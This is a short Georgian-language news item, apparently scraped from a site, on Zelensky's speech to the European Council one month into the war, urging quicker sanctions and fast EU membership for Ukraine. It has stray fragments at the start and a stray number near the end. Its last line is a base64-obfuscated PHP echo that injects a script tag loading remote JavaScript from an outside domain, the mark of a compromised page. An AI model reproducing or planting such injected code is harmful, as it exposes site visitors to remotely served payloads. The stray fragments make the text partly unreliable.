celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა ვოლოდიმერ ზელენსკიმ ევროპული საბჭოს წევრებს სიტყვით მიმართა, მან ომიდან ერთი თვის თავზე, უკრაინაში არსებული მდგომარეობის შესახებ ისაუბრა და საბჭოს წევრებს მხარდაჭერისკენ მოუწოდა.
 
"სანქციები ცოტა უფრო ადრე რომ ყოფილიყო, რუსეთი ამ სასაკლაოს არ მოაწყობდა. ეს ჩვენზე უკეთ არავინ იცის. ჩრდილოეთ ნაკადი 2 დაბლოკეთ, რისთვისაც მადლობლები ვართ, ეს სწორი გადაწყვეტილება იყო, თუმცა ესეც ცოტა დაგვიანებით მოხდა. თავის დროზე რომ დაბლოკილიყო, რუსეთი ბუნებრივი აირის კრიზისს ვერ შექმნიდა, ახლა კი ჩვენ ერთად ვემზადებით უკრაინის ევროკავშირში გაწევრიანებისთვის. აქ კი ახლა გთხოვთ, არ დაიგვიანოთ. თქვენ ყველამ ნახეთ, რა შეგვიძლია, რას ვაკეთებთ. ახლა კი უკრაინა ევროკავშირის წევრი უმოკლეს ვადაში უნდა გახდეს. თქვენ ამის შესაძლებლობა გაქვთ, ჩვენ კი ამის შანსი", - მიმართა ზელენსკიმ ევროპული საბჭოს წევრებს.
732
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");